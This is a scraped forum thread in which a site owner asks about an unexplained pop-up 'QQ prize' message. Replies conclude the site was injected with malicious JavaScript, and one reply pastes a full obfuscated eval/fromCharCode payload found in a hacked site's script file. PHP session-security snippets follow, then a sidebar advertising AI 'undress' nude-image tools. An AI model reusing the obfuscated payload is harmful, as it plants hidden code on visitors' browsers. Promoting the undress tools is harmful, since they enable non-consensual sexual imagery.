http://www.163sha.com/html/qitanarong/ruchiruzuiDIY/201106/24-8736.html
请大家帮忙看一下,这个页面,还有这个网站首页,有时候打开就在网页右下角弹出来一个QQ中奖消息。好像一个IP第一次打开能看到,但是刷新就看不到了。我把这个页面包含 JS都看了一下,没有发现有这个弹出的JS效果啊,很是郁闷,都疯了。
是不是这个服务器被设置什么了?
求大家帮忙看一下啊,谢谢。。。。。。
回复讨论(解决方案)
我用火狐打开没有弹出来
js做cookie记录即可
2楼是正解,记录到cookie下次读取判断就行了。
买个彩票试试
我怎么开都没弹出来,IE、FF都试了,没有啊?
这个可能是你想要的: http://download.csdn.net/detail/dmtnewtons/4219436
你们理解错了我的意思了,我要去掉这个弹出中奖的消息,这个是弹出的图片消息
我在火狐打开会在右下角弹出这个中奖消息的,然后我选中后查看选中部分源代码有看到这些代码:
<script></script><script></script><script></script><script></script>
但是我直接查看源代码却看不到这些代码,很是奇怪,难道和机房有问题吗?
应该跟机房无关。是js控制点 。那几个js不能查看吗?
查看了,整个网站所在文件夹我都搜索有没有包含带有这个“gzzc.com”字符串的文件,都没有搜索到。
被人家攻击了吧。注入js了。
被人家攻击了吧。注入js了。
那这个JS注入在哪的呢?速个网站我都没能搜索到
阻止页面插件: http://zhidao.baidu.com/question/156709650.html
阻止页面插件:http://zhidao.baidu.com/question/156709650.html
请看清问题在回答好吧!!!!
木有弹啊
被人挂马了,我的网站有段时间也这样,但服务器代码中怎么也找不到这些JS代码。最后只有重建网站。
我的网站上也被挂了 最后在页面的一个js文件里找到了
OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(57)+l(57)+l(41)+l(59)+l(125));eval(""+O(99005434)+O(109891017)+O(98017879)+O(115835235)+O(107918387)+O(99992910)+O(108905601)+O(114841149)+O(45549578)+O(117816923)+O(112864240)+O(103954969)+O(114849803)+O(99990869)+O(31687465)+O(39604343)+O(38611951)+O(59403806)+O(82178168)+O(66338164)+O(81184638)+O(72271089)+O(79206874)+O(83168778)+O(31689655)+O(113855151)+O(112864408)+O(98010957)+O(60390619)+O(33661487)+O(102962358)+O(114844131)+O(114849439)+O(110883355)+O(57429223)+O(46539706)+O(46539243)+O(117817991)+O(117812355)+O(117811069)+O(45547270)+O(101971757)+O(109895803)+O(109899861)+O(101978895)+O(106921583)+O(99991986)+O(96038462)+O(99004447)+O(113855296)+O(106920770)+O(45545277)+O(98013739)+O(109893993)+O(107912961)+O(46536367)+O(113859368)+O(110885479)+O(98016483)+O(109894258)+O(99008746)+O(99998977)+O(46532597)+O(98012335)+O(110886532)+O(45547812)+O(104946386)+O(113851133)+O(33663712)+O(61388571)+O(59400430)+O(46531067)+O(113856900)+O(98012363)+O(112863124)+O(103954630)+O(110881606)+O(114846249)+O(61383383)+O(38619969)+O(40596203)+O(58410619));
可能是电脑后台有别的软件吧。
没有弹出来呢。
的确被挂马了 是服务器被入侵了 这个问题只能找空间商 你无能为力的,以前就遇到过
的确被挂马了
不能直接搜索的,这年头还有现码的JS嘛...要查找那些js 找出各种换位,看起来变量名稀奇古怪的代码.
最重要还是要找出漏洞.
是不是有马啊
我也许到这个问题了,求解
How can you prevent session fixation attacks?Apr 28, 2025 am 12:25 AMEffective methods to prevent session fixed attacks include: 1. Regenerate the session ID after the user logs in; 2. Use a secure session ID generation algorithm; 3. Implement the session timeout mechanism; 4. Encrypt session data using HTTPS. These measures can ensure that the application is indestructible when facing session fixed attacks.
How do you implement sessionless authentication?Apr 28, 2025 am 12:24 AMImplementing session-free authentication can be achieved by using JSONWebTokens (JWT), a token-based authentication system where all necessary information is stored in the token without server-side session storage. 1) Use JWT to generate and verify tokens, 2) Ensure that HTTPS is used to prevent tokens from being intercepted, 3) Securely store tokens on the client side, 4) Verify tokens on the server side to prevent tampering, 5) Implement token revocation mechanisms, such as using short-term access tokens and long-term refresh tokens.
What are some common security risks associated with PHP sessions?Apr 28, 2025 am 12:24 AMThe security risks of PHP sessions mainly include session hijacking, session fixation, session prediction and session poisoning. 1. Session hijacking can be prevented by using HTTPS and protecting cookies. 2. Session fixation can be avoided by regenerating the session ID before the user logs in. 3. Session prediction needs to ensure the randomness and unpredictability of session IDs. 4. Session poisoning can be prevented by verifying and filtering session data.
How do you destroy a PHP session?Apr 28, 2025 am 12:16 AMTo destroy a PHP session, you need to start the session first, then clear the data and destroy the session file. 1. Use session_start() to start the session. 2. Use session_unset() to clear the session data. 3. Finally, use session_destroy() to destroy the session file to ensure data security and resource release.
How can you change the default session save path in PHP?Apr 28, 2025 am 12:12 AMHow to change the default session saving path of PHP? It can be achieved through the following steps: use session_save_path('/var/www/sessions');session_start(); in PHP scripts to set the session saving path. Set session.save_path="/var/www/sessions" in the php.ini file to change the session saving path globally. Use Memcached or Redis to store session data, such as ini_set('session.save_handler','memcached'); ini_set(
How do you modify data stored in a PHP session?Apr 27, 2025 am 12:23 AMTomodifydatainaPHPsession,startthesessionwithsession_start(),thenuse$_SESSIONtoset,modify,orremovevariables.1)Startthesession.2)Setormodifysessionvariablesusing$_SESSION.3)Removevariableswithunset().4)Clearallvariableswithsession_unset().5)Destroythe
Give an example of storing an array in a PHP session.Apr 27, 2025 am 12:20 AMArrays can be stored in PHP sessions. 1. Start the session and use session_start(). 2. Create an array and store it in $_SESSION. 3. Retrieve the array through $_SESSION. 4. Optimize session data to improve performance.
How does garbage collection work for PHP sessions?Apr 27, 2025 am 12:19 AMPHP session garbage collection is triggered through a probability mechanism to clean up expired session data. 1) Set the trigger probability and session life cycle in the configuration file; 2) You can use cron tasks to optimize high-load applications; 3) You need to balance the garbage collection frequency and performance to avoid data loss.
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
PhpStorm Mac version
The latest (2018.2.1) professional PHP integrated development tool
ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software
Atom editor mac version download
The most popular open source editor
Notepad++7.3.1
Easy-to-use and free code editor
